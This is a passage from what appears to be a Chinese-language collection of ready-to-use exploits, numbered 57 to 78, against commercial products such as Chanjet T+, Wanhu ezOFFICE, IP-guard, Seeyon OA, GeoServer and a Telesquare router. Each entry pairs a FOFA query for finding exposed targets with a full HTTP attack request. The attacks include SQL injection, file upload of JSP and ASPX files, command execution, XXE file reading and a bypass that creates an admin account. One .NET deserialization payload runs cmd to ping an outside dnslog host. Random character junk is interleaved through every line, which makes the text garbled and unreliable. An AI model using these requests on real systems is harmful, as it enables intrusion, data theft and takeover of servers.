Content-Type: application/json
4 U3 X4 t# `' A2 {! b. q: f# k5 U) k% Y9 K
{6 R* G# y O# |* y0 B
"storeID":{
! t0 f9 ?7 W" z0 Z' ?) T "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
7 }+ |7 Z! ?7 b( F "MethodName":"Start",
- B3 p% v: R& ?4 ` B "ObjectInstance":{
( ]7 H0 j$ ?; R1 x& U "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",4 V4 N7 J% G# [! O' Q; _: q7 ^ S
"StartInfo": {
; S. ?. T; N% i2 y( h "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",, x1 ^+ M: Z4 L! C! i
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
( F g+ U1 A8 M2 k; H }
% E) P0 }% a# T% T }
+ A- m9 K/ X7 h; X7 s% h# G }" D, t* w) s; f3 c6 |/ [: y6 i# Z
}3 a2 L0 g* c9 e% ~% i" ?
7 b" W; u4 [& a0 ?& ~8 a, F; K, d0 w
57. 畅捷通T+ keyEdit.aspx SQL注入
6 p7 u+ v# C; b* Z* [ y+ W3 @FOFA:app="畅捷通-TPlus"
' h1 A2 |* _$ i4 nGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1) R% F+ A6 |" n6 N
Host: host" s( ]5 T, c$ }5 O
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
4 \. n2 r4 v: `' `/ oAccept-Charset: utf-8
/ l# @- {0 O2 y- G8 ~Accept-Encoding: gzip, deflate
! r" g6 S) t0 t: l/ P, L+ dConnection: close/ d5 t1 ~, H6 F4 f2 G) N
4 g6 W6 I( f {! h( Z$ q& W0 x
3 C$ x; F5 O9 `1 E7 t) R58. 畅捷通T+ KeyInfoList.aspx sql注入, t! |1 J8 S3 q+ S6 V9 O& }, @
FOFA:app="畅捷通-TPlus"
, H7 c0 |! O/ S# Z% \2 M1 XGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
5 Z8 l4 C& O. e+ v! M9 ~* SHost: your-ip1 m& G* I# q) n
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
" ~% V( P) P8 G+ I, aAccept-Charset: utf-88 B/ w. n& d c$ b
Accept-Encoding: gzip, deflate! }. ^, V3 B' G
Connection: close0 ^/ L0 o. y# s+ \
2 F% q- S2 F. D! K6 ?+ G9 V) \
0 W/ H' t* L+ y8 e2 d% ?; d
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
8 c8 v8 ^' V: Z+ vFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
p) V' e1 U& f) j( X2 \POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
" K; A4 X$ ^) L/ c5 E9 [" RHost: 192.168.86.128:9090
) q9 r* D- a- @3 {6 K; LUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.361 N0 I h! ]0 j9 H
Connection: close
2 M) N M( _. v( ~Content-Length: 1669& j) A; t0 r9 P3 I
Accept: */*
& i# L9 d$ e+ S& X! T/ N! Z& UAccept-Language: en2 B/ Q E! X5 R. P
Content-Type: application/x-www-form-urlencoded
- X+ M3 q O4 Y `5 b1 yAccept-Encoding: gzip, T# G' }8 o. ~
8 u$ S( w1 l. F1 |) E! {2 S
PAYLOAD
2 Q( i. ]2 D. v) c( F# B4 v: S
2 r5 R( r F; d) ~; E8 o9 P
u' e0 d7 H6 }/ L60. 百卓Smart管理平台 importexport.php SQL注入
; _; C* l6 T$ iFOFA:title="Smart管理平台"; X! P7 R/ V$ x8 F. R1 b7 o7 Q: G. N
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.11 n: e: i2 @8 X3 w7 z
Host:
- m' j+ B1 g2 E( n5 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 W/ x% |& X9 H+ @3 ?, O" YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 d+ `" H j) B8 z: s/ A
Accept-Encoding: gzip, deflate* w( ^! O' z+ \/ ~0 { y
Accept-Language: zh-CN,zh;q=0.9: c) x( \9 y7 H2 W
Connection: close/ g9 I* t7 \2 A6 m/ H7 J! L& |
7 S9 s4 m' q- K$ N" \# c+ N, g' ]" J
9 @2 D5 ?8 P8 [61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
" O1 m. M2 t; o( E! M! P8 KFOFA: title="欢迎使用浙大恩特客户资源管理系统"
5 T0 p& M$ k+ P; Z3 F5 Y0 @; m- A: {POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.13 h! ?' u {' A& b
Host: x.x.x.x
2 c' T0 G; o; D9 A* N3 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& p' Z) f m3 D; ^5 q. t* F" R# D
Connection: close
9 m: X" Z( e' U, c8 }. E% p/ EContent-Length: 27
; a; ]% m1 ?( a2 RAccept: */*+ }- [5 G3 R; `( ?4 C" k
Accept-Encoding: gzip, deflate4 u6 T1 o- ]% W- l R
Accept-Language: en/ k7 z( [( W& h o
Content-Type: application/x-www-form-urlencoded
( }' ?8 N. C# g1 m6 p9 s' T# J( |8 \$ q8 f
8uxssX66eqrqtKObcVa0kid98xa9 m; ]1 g8 p0 I
1 F9 m, u# m1 T0 e3 \/ C; O
3 H+ r/ S* g5 S% O; g$ G# W5 g62. IP-guard WebServer 远程命令执行/ ?5 s$ J3 y9 P. _* V8 M7 w
FOFA:"IP-guard" && icon_hash="2030860561"2 J8 d0 ~+ t0 F( }: C# ^$ z
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
1 G8 K. C/ g0 d+ y0 Y# ~Host: x.x.x.x
% P B& f$ P! j% }- h, L' N j+ }+ @User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
* ]+ ^. ~9 o' G- N2 \Connection: close
+ X( o" L( q# jAccept: */*6 H. j2 t& I# H9 `3 W0 z
Accept-Language: en
: n7 ]* `& Y% g+ W7 B/ F. t4 QAccept-Encoding: gzip1 f. ]' r( t3 i+ |# k: p1 @
( s/ S0 p; K5 \8 m7 a
" Y- M$ J% U. d7 [9 a9 c
访问8 |/ E8 M ~2 l' ~; l( ^
9 C6 T' u0 `! ?: W: r: m8 v6 [
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.13 @6 q8 j0 Z8 \' M; u# r
Host: x.x.x.x
2 l0 v5 @3 @9 d+ y3 r! }% _3 V
. \( b$ u2 G2 l( n$ P' C63. IP-guard WebServer任意文件读取$ }' v4 @4 I* c* H" g
IP-guard < 4.82.0609.0( K" {3 q1 C% F
FOFA:icon_hash="2030860561"2 i2 d# J( R! ?9 D- c
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
' |( c% _4 `/ B% O1 o8 eHost: your-ip
3 y& D- T& M# y7 m+ \' vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
" l6 d0 J+ O# `/ p( W$ T, |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 D. _6 \* r: {" ~9 h6 M
Accept-Encoding: gzip, deflate
4 f9 \+ K9 z% z6 b/ t; C: IAccept-Language: zh-CN,zh;q=0.9
" O; Z- R1 L) Z6 G) G' r; H MConnection: close x- J; E+ l, n2 s' }9 ~* @
Content-Type: application/x-www-form-urlencoded* E. j7 [- G$ Y& W) s1 Y% H4 Q T `
7 P% w P) X- k! V. c8 ~4 q6 {
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A! u4 R: J4 N; U$ {/ L
) X) z$ ^, x8 X u7 I
64. 捷诚管理信息系统CWSFinanceCommon SQL注入0 _1 n4 O2 V6 u/ q8 ^
FOFA:body="/Scripts/EnjoyMsg.js"
5 p5 R! p/ W' {+ G. mPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
+ I( @1 D, K4 X2 J% H/ ]Host: 192.168.86.128:9001
8 f; Y1 x _$ b& y7 b5 HUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
. y4 E# I) B% I+ ~6 |, r BConnection: close
5 @) e* C. Q1 ^Content-Length: 3696 x$ s& o" i2 Q+ T
Accept: */*
- v9 w6 x+ k/ jAccept-Language: en
, _2 L! q5 y7 T; ?$ N; b. M8 hContent-Type: text/xml; charset=utf-8
, i1 U9 q7 C7 s# W j, S' C5 }Accept-Encoding: gzip3 A4 B! ]/ Z" \- j1 y. D
' Z) S6 ^" E! L/ P<?xml version="1.0" encoding="utf-8"?>
) d* s" ?$ x5 ^: G' n0 G7 C<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
( |; X% Q& P: r# u+ H( ^3 I<soap:Body>0 ^) h4 K- a/ j
<GetOSpById xmlns="http://tempuri.org/">
9 O& a4 R# ^$ i; d% X3 T9 } <sId>1';waitfor delay '0:0:5'--+</sId>! ?# n+ Q% S7 w) A5 s% z
</GetOSpById>
; l% w ~6 v& `6 j </soap:Body>
$ m$ y8 [9 ~' C- W5 j</soap:Envelope>" }, W5 L1 ~, d8 e
; F" ?" {( P$ d3 P! x% R* _* m" y
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过2 z& {+ }" k/ {; O6 ~& K
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
9 k) K: _, \" }: o" V* r响应200即成功创建账号test123456/123456
1 B7 k/ P$ s" `. j' OPOST /SystemMng.ashx HTTP/1.1
4 x/ U8 h( Q/ {3 C+ K( Y/ T/ eHost:
$ b/ U& t+ J; A. @2 OUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
, [8 M1 e: I+ W. a- J0 f1 q' wAccept-Encoding: gzip, deflate( Y/ ?$ Z2 y! e
Accept: */*
% I' P8 k/ V* H9 j- w' P# rConnection: close Q2 Z* l) G7 ^) F
Accept-Language: en
4 y* k) H5 f1 F" m2 |Content-Length: 174
: A& D' |" {4 n& J7 j! q7 k
9 z1 y: B' H$ h, _, R( d1 XoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators5 ?6 V) F% Y# d9 p8 }+ b5 P4 Q
3 ?$ G+ Z0 `. E8 L$ M8 w9 S
6 u/ ]2 d7 t! l# h, a66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入" W+ O0 P, y. Q1 G' Z
FOFA:app="万户ezOFFICE协同管理平台"$ O3 i O# Q r/ I& z. K
/ p) v, j+ |0 b) t$ x( _
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
. R2 m% L/ }2 ]0 WHost: x.x.x.x
$ x; y3 L$ S" G& W; M( L- Y; u8 R3 G% M+ uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
: W) u* {$ B9 s; q0 O9 l4 MConnection: close2 r) l8 ?+ v8 Q5 |- B
Accept: */*: C; G9 P6 k* l7 S# _$ {" y6 s
Accept-Language: en" h% X9 [4 d) q+ y
Accept-Encoding: gzip7 y% u* k" S: \; x; v, c8 [
4 _) ^( d l: g9 P. ?' d* X+ u
. O( t" s6 B* }; W7 U
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在( i; ~4 |( d6 i* x+ n% Y
" p7 x: |& }) I! U67. 万户ezOFFICE wpsservlet任意文件上传, @9 e( N. i$ E$ \
FOFA:app="万户网络-ezOFFICE"5 u/ n) t, E5 s
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型2 W2 Q( @- q- q/ \! [* }! y$ P
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.12 C D3 |6 b9 j
Host: x.x.x.x7 \2 ?: V( h6 J# ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
0 V! A& y3 @5 g0 V) g! P) j3 XContent-Length: 173
" M# K8 c) @% Y, kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ k9 f; c @6 l; yAccept-Encoding: gzip, deflate
4 B9 l! L# w. g' v& iAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
& _" u6 z8 ?) `0 Y/ l' o) kConnection: close3 w- Z/ R" ~' u" p( y0 H
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp. o) l: s+ J4 [9 A! u) w
DNT: 1" o/ _5 B% A9 U9 m, Q" F: j% r* a6 D& p2 @' M
Upgrade-Insecure-Requests: 1
3 {1 o0 Q' S( V7 O) G7 o" n
( [6 F0 V% s7 x% l--ufuadpxathqvxfqnuyuqaozvseiueerp
& o4 n+ M0 {3 @! T& V# oContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
9 y4 y% D+ @8 \7 g Z$ U' s6 s. e6 a
<% out.print("sasdfghjkj");%>7 ] j! A/ m6 S' R7 E# p
--ufuadpxathqvxfqnuyuqaozvseiueerp--- O: M( Y0 k9 z
. z L) d/ r. Z n4 ]7 ~
; }' ?5 o- v* g- k2 X% W- W; o4 N文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp- K: T1 W5 \( v7 E
! h6 C/ [$ y) x. y; G
68. 万户ezOFFICE wf_printnum.jsp SQL注入7 `0 U2 N4 l. P
FOFA:app="万户ezOFFICE协同管理平台"
6 \7 ? O" Y& Y0 \GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
- ]( d0 y# ^; B R. sHost: {{host}}
- ]7 [# K# ?* ^5 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36: w2 r' O% ]& p5 Y
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
* ?. s; g6 P4 CAccept-Encoding: gzip, deflate
" r* O& s* [( F, iAccept-Language: zh-CN,zh;q=0.9
7 w! K( s5 M( E S4 e5 C! i' IConnection: close" X" T/ q5 z4 u4 a; V& [& x/ ]' z% p
+ B- c) q4 L6 N/ \$ ?) c$ X
5 H. v" T! c! |/ q
69. 万户 ezOFFICE contract_gd.jsp SQL注入, e4 K. X6 I1 S7 ?9 ~
FOFA:app="万户ezOFFICE协同管理平台"
* n+ Y+ q; W8 ~5 P" ^( ?GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.11 v6 n6 t! A! z9 n
Host: your-ip
' k4 D7 v( f1 s6 y# G5 \) zUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
, ]# D/ I0 e/ m' S oAccept-Encoding: gzip, deflate' C) f0 z: {# e1 A; J' Z' a8 \
Accept: */*
% B" @6 K4 s7 @8 T# bConnection: keep-alive6 ?2 C% q4 t5 ]+ `- Z* |
5 M c2 I7 B7 i2 g2 F$ F( Q
9 }0 v. h9 z' D \6 g
70. 万户ezEIP success 命令执行* H5 }4 b! K. }. @& S2 @( v- t
FOFA:app="万户网络-ezEIP"
/ g' G0 V8 R+ \0 {8 u; f E- VPOST /member/success.aspx HTTP/1.1- |5 w+ r( \' x2 ]+ P$ S4 j* [- u
Host: {{Hostname}}0 s. l! S1 L( e/ d; Q9 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.365 u& N8 W8 X6 e
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=) u2 W; Q v7 L; u' J
Content-Type: application/x-www-form-urlencoded
! r( V; {) t5 c! {% R- F% d" bTYPE: C
- q! ^/ Z0 A8 e/ H- ?* m- e1 h+ ?Content-Length: 16702: ~$ R# V2 F. ~9 Q/ K
# y: p# v3 ^- J- R, p- Q! E
__VIEWSTATE=PAYLOAD2 D# a" z% \: L- Y6 s3 ^
9 G+ j8 {6 U. ?1 p& q0 h; r8 @. V' A
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
/ O: k3 F- v$ \: g) n4 aFOFA:body="PM2项目管理系统BS版增强工具.zip" L5 ]; e. w/ c9 W
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
& P2 K+ f3 n2 O2 Q3 z; G* kHost: x.x.x.xx.x.x.x
7 G' r: b# B$ IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
0 w8 } `8 a! H& L* S% K- u' l6 UConnection: close
) D7 G2 c6 w/ A; g! l9 q& j8 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 ]: ^. M9 l: N: Q, i8 F! qAccept-Encoding: gzip, deflate
! q3 Z9 H: d3 @1 H% r6 A- f8 WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 ^* c7 P3 C. fUpgrade-Insecure-Requests: 1
* U; ~; @4 b* \- K7 B* ?5 H
, x$ A+ |9 v w$ z1 p, E
) A& e, N& e& I3 p7 z72. 致远OA getAjaxDataServlet XXE
2 R6 U% }/ ^( k! H8 QFOFA:app="致远互联-OA"% [* y, ]+ r* ?( Q% m3 ^8 i
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1; C+ U X8 q1 c) s. y
Host: 192.168.40.131:8099
8 m1 K; d- _7 O8 `2 fUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.366 m, P1 n- O0 o
Connection: close
% J% n! I) ]% iContent-Length: 5838 T' A1 `" ?1 P4 ]
Content-Type: application/x-www-form-urlencoded
+ \; _5 m% l: n' AAccept-Encoding: gzip
2 U7 G: N4 R3 _% r/ S
1 r9 u) Z g1 I, G9 f. @S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
- d5 U* x1 n4 ^/ u; H3 n! P1 |0 ~: T# I/ i1 e- ^0 r7 g( f1 B9 E
C R, {; E7 \ G73. GeoServer wms远程代码执行
8 i# g& M' C9 l/ N* b( h. PFOFA:icon_hash=”97540678”! |% Q2 M1 L; g! H; F2 }2 |( P& L3 k
POST /geoserver/wms HTTP/1.1' }, @( _2 y% M( [4 l" `: j( P
Host:
/ f) ~- h' h5 m; v! {# a2 y1 t0 v- tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
4 B* Y* P6 L" IContent-Length: 1981$ g9 X8 Z# k8 U- u7 T) K
Accept-Encoding: gzip, deflate P9 E3 y; g- `! a r2 {
Connection: close6 U1 J3 z* `( K* l( h% l, }
Content-Type: application/xml
4 A7 u: f0 ^; o2 h! K5 eSL-CE-SUID: 35 E7 t+ Y7 h+ ^+ U3 d( a
7 ` S7 ^: L4 S2 d; ]PAYLOAD
$ \4 X$ [) B9 ~7 ~0 A, b0 m" B! W/ N! M1 D
1 Z5 r- z- v* S* D4 a& G74. 致远M3-server 6_1sp1 反序列化RCE0 [3 w$ f1 m; r1 |$ P! a
FOFA:title="M3-Server"# u# _) c5 j* I8 ^# G$ s0 g
PAYLOAD1 y/ A+ X# u& ^0 U( u' E( a2 b
. F; l7 z9 W8 x4 o1 G& `4 s75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
2 q0 r3 A* S H3 C1 g# Z( R- v2 ^FOFA:app="TELESQUARE-TLR-2005KSH"
: B& t f- t% Z7 k' wGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1; X0 `6 q; a, y R
Host: x.x.x.x
# _5 M+ w" u0 J3 M0 X7 M2 }+ P0 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 x0 ?; g5 X2 b! D: o9 oConnection: close
: I: j' C# J7 @8 mAccept: */*
/ l: T0 F4 W( _1 J3 ]Accept-Language: en
e: \' l4 P- Y% [6 E6 ]6 qAccept-Encoding: gzip" O% w- Y# l( {# ~$ h9 ~4 G3 Q
% Y# m Y/ p! ]7 T" |
; L# |& l, I4 g5 i( JGET /cgi-bin/test28256.txt HTTP/1.1
9 A0 n" P: d3 }# L/ Y6 UHost: x.x.x.x# S+ Z, p5 c4 J9 c$ e; }9 D
9 X2 Z8 q5 n/ R6 D6 x- A
: W& u/ p& b3 @+ \4 u; @
76. 新开普掌上校园服务管理平台service.action远程命令执行
5 h, [& M3 t) E; |9 u3 U' ^FOFA:title="掌上校园服务管理平台". w3 M+ l, H! A! W$ S4 I
POST /service_transport/service.action HTTP/1.1
, z; l$ u+ S( o. B9 PHost: x.x.x.x0 N: A! ? B7 x0 b9 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
. x4 j- Y* e( aConnection: close
2 f& j; ~. l8 \9 b5 n: \Content-Length: 211
% ^* ?2 J" E) CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ \" R7 {8 f" B+ J# v$ l/ y
Accept-Encoding: gzip, deflate
. P: X$ b, Y2 G' _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 h0 a' Y3 G. L7 Z( u) Z# V+ zCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
7 R* E9 U+ D. PUpgrade-Insecure-Requests: 1* d* D7 p% o( ], z6 ~
( `9 |% h4 Q# ~: F{( Q2 \! }, u8 |/ M7 K) y. b* c4 |$ [
"command": "GetFZinfo",
$ m8 B0 E- C, C "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
# b8 y% w. e; }0 d1 d v2 [3 S ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"* c- u( a8 k9 Z' x3 q7 T2 }7 L
}
! D( G, B( s# p) h$ ?% N. v/ H: ^: D# s# g/ k5 U
- h* J# Y0 L! T; Q/ NGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1! c& ^7 t% b7 j4 x
Host: x.x.x.x
/ `9 C h, y7 Q$ r! Z& ?: k# f8 O$ q7 j% S- C
* H( r$ s* d6 }0 R3 E
! ?2 v' O0 T7 W% T& x% N5 T" L/ ^8 ]% `77. F22服装管理软件系统UploadHandler.ashx任意文件上传
8 ?! ^, y$ m, QFOFA:body="F22WEB登陆"+ `9 C" ?2 V5 @: P3 {& ^$ M
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1" y9 V% g( V; w
Host: x.x.x.x0 Z7 X7 P# b7 F1 b1 Y3 O1 _0 m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
5 W$ T( N5 E7 V2 a; S2 bConnection: close
. g: E2 b7 U% M* U( W, eContent-Length: 433
! V# b2 f$ c3 w9 n/ lAccept: */*
$ e$ H1 ~7 `3 zAccept-Encoding: gzip, deflate
~2 R. Q# ^+ p- z- |" w" aAccept-Language: zh-CN,zh;q=0.9
# j c% D. O; F' c% yContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
; M$ }. k1 w( _! A4 I9 C
! b0 t, d& s2 T. {; H/ _------------398jnjVTTlDVXHlE7yYnfwBoix
, u; @* ?) G$ x- YContent-Disposition: form-data; name="folder"6 W6 [7 n( }% w A( C4 o# V+ _
4 b- \, o2 \6 Y6 c& F0 N
/upload/udplog8 u5 x, |. q1 h$ ?$ O. ^; {
------------398jnjVTTlDVXHlE7yYnfwBoix4 J) c. {4 o% `0 s+ ^0 H! l
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
- a( O) u, p! k" t3 ?: RContent-Type: application/octet-stream; u5 J. c$ c' q h# w9 h
- {' N! G' S1 X6 B: b9 h! Y
hello1234567( f. u/ s$ I! K) a$ e$ W
------------398jnjVTTlDVXHlE7yYnfwBoix
/ i7 d% X& u% D4 P( }& RContent-Disposition: form-data; name="Upload"
( Y* Z! J6 F4 @9 y1 _
: [9 _2 X/ \. |; ], L) XSubmit Query
2 V v' O/ y& ?! A- ~' K------------398jnjVTTlDVXHlE7yYnfwBoix--5 x, S3 c7 }9 M+ [9 {* \
; [/ V1 y6 f) E: C* Z& b% A+ h v x, r: w2 m3 v# r
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传( w8 R+ [& l6 ~1 a8 p, Y
FOFA:icon_hash="2001627082"
# j, Q/ p8 k# L0 `$ E M# w: gPOST /Platform/System/FileUpload.ashx HTTP/1.1, O& N5 @$ D' g% K" x
Host: x.x.x.x# d/ D% v* V3 G2 G |( s: Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. @3 ?% z2 |$ C$ z9 o# a
Connection: close
5 {1 |% j1 m$ pContent-Length: 336& | [" N0 G* Y" E! K0 U- H( h
Accept-Encoding: gzip
6 j4 {2 ~2 b+ i/ F) o8 O' x% e& x( B3 sContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l) P" ?; A1 H! a" w( ~
@! h; T0 B+ [* G
------YsOxWxSvj1KyZow1PTsh98fdu6l
* W+ X3 g( X! v' V5 ?% [Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"% h$ d& g( V5 O R% ?# p* |4 O9 c1 a
Content-Type: image/png% n* L7 O7 z) u6 c& e7 m
?8 H. u* l) ]! I V
YsOxWxSvj1KyZow1PTsh98fdu6l7 w u' U* F* ?% N# v
------YsOxWxSvj1KyZow1PTsh98fdu6l- v5 O3 u7 v- N8 x2 Q X' Q& g
Content-Disposition: form-data; name="target"2 s. `" r0 i; E$ E6 d
1 @7 n9 k3 g$ o, B, Z
/Applications/SkillDevelopAndEHS/% o/ a. e& W4 m% g
